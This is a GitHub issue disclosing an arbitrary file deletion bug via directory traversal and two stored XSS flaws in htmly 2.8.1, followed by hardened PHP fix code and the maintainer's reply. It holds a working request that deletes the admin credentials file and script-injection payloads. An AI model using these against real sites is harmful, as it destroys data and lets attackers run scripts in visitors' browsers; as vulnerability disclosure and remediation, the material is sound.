Arbitrary file deletion and Persistent XSS exists on htmly 2.8.1 #481

Closed
fuzz7j opened this issue Jul 11, 2021 · 2 comments

fuzz7j commented Jul 11, 2021

1. An arbitrary file deletion vulnerability in the backend

In htmly-2.8.1\system\admin\views\backup.html.php, line 7:

if (!empty($file)) {
    unlink("backup/$file");
}

When we delete our backup files, we can delete any files on the system through directory traversal.
(screenshot: delFile1)

Example:
When we log in, we can go to Settings -> Backup -> Create backup, then click Delete, and we get a link. Then we modify the file field to /config/users/admin.ini and submit.

GET /admin/backup?file=../config/users/admin.ini&submit=Delete HTTP/1.1
Host: 10.211.55.3:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.211.55.3:8888/admin/backup
Cookie: CSRF_TOKEN=ncDpMG6sz9cWAhPp; kodUserID=1; __51uvsct__JH8lWQvr8bXXIzV9=2; __51vcke__JH8lWQvr8bXXIzV9=c4695bd5-02b6-5295-974b-e8ddcfdf0022; __51vuft__JH8lWQvr8bXXIzV9=1625743826644; HOST=http%3A//10.211.55.3%3A88/; APP_HOST=http%3A//10.211.55.3%3A88/; kodUserLanguage=zh-CN; kodVersionCheck=check-at-1625809444; X-CSRF-TOKEN=m655d6hVx8EiMrw2nNue; PHPSESSID=4pau0op8l24alsd5sps034a4l2
Upgrade-Insecure-Requests: 1

The administrator information has been deleted and no one can log in to the system.

2. Persistent XSS on Blog title

Since the blog title is not processed by htmlentities
(screenshot: blogtitleXss3)
when we change the blog title to <script>alert(/test/)</script>, JavaScript is executed.
(screenshot: blogtitleXss1)
(screenshot: blogtitleXss2)

3. Persistent XSS when creating a regular blog post

When creating a regular blog post, enter
</div><script>alert(/xxx/)</script> in Content and visit the article; JavaScript is executed.
(screenshot: contentXss1)
(screenshot: contentXss2)
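The two root causes in items 1 and 2 above (an unchecked `$file` passed to unlink, and a blog title written into HTML without escaping) can be shown side by side. The following is an added example, not code from htmly or from the reporter; the function names `delete_backup_safe` and `render_title`, the `.zip` extension allowlist and the temporary directory layout are assumptions made for illustration. Item 3 is different in kind: a post body is rendered as HTML by design, so plain escaping is not the fix there and it is left out of this example.

```php
<?php
// Added example: hardened versions of the two patterns reported above.
// Not htmly's code; function names, the .zip allowlist and the directory
// layout are assumptions.

// Vulnerable pattern from the report (kept for comparison):
//   if (!empty($file)) { unlink("backup/$file"); }
// $file comes straight from the query string, so "../config/users/admin.ini"
// walks out of backup/ and deletes the admin credentials.

function delete_backup_safe(string $backupDir, string $file): bool
{
    // 1. Reject anything that is not a bare file name: no path separators,
    //    no parent references, no NUL bytes (which truncate paths in C calls).
    if ($file === '' || $file !== basename($file) || strpos($file, "\0") !== false) {
        return false;
    }
    // 2. Only the file type the backup feature creates may be deleted
    //    (assumed here to be .zip archives).
    if (!preg_match('/^[A-Za-z0-9_.-]+\.zip$/', $file)) {
        return false;
    }
    // 3. Resolve both paths and require the target to stay inside backupDir.
    //    realpath() follows symlinks, so a planted link is caught as well.
    $base   = realpath($backupDir);
    $target = realpath($backupDir . DIRECTORY_SEPARATOR . $file);
    if ($base === false || $target === false) {
        return false; // directory missing or file does not exist
    }
    if (strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false; // resolved path escaped the backup directory
    }
    return unlink($target);
}

// Escape the blog title before it is placed in an HTML text node or
// attribute. The report shows <script>alert(/test/)</script> executing
// because this step was missing.
function render_title(string $title): string
{
    return htmlspecialchars($title, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Self-check against a constructed layout in a temporary directory.
$tmp = sys_get_temp_dir() . '/htmly_demo_' . bin2hex(random_bytes(4));
mkdir("$tmp/backup", 0700, true);
mkdir("$tmp/config/users", 0700, true);
file_put_contents("$tmp/config/users/admin.ini", "user=admin\n");
file_put_contents("$tmp/backup/site.zip", "PK");

// Traversal attempt from the report: must be refused, admin.ini must survive.
var_dump(delete_backup_safe("$tmp/backup", '../config/users/admin.ini'));
var_dump(file_exists("$tmp/config/users/admin.ini"));
// Legitimate backup: may be deleted.
var_dump(delete_backup_safe("$tmp/backup", 'site.zip'));
// Title payload from the report, rendered inert.
echo render_title('<script>alert(/test/)</script>'), "\n";

// Clean up the constructed layout.
unlink("$tmp/config/users/admin.ini");
rmdir("$tmp/config/users");
rmdir("$tmp/config");
rmdir("$tmp/backup");
rmdir($tmp);
```

Run it with `php delete_backup_safe.php`. The basename check alone would already stop the `../` payload from the request above; the realpath containment test is the layer that also holds if a symlink is ever dropped into the backup directory, and the extension allowlist keeps the endpoint from being turned into a generic deleter for files that happen to live there.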

danpros (Owner) commented Jul 11, 2021

Hello,

This has been fixed in repo. See #463

danpros (Owner) commented Jul 12, 2021

Please see this one #481

danpros closed this as completed Jul 12, 2021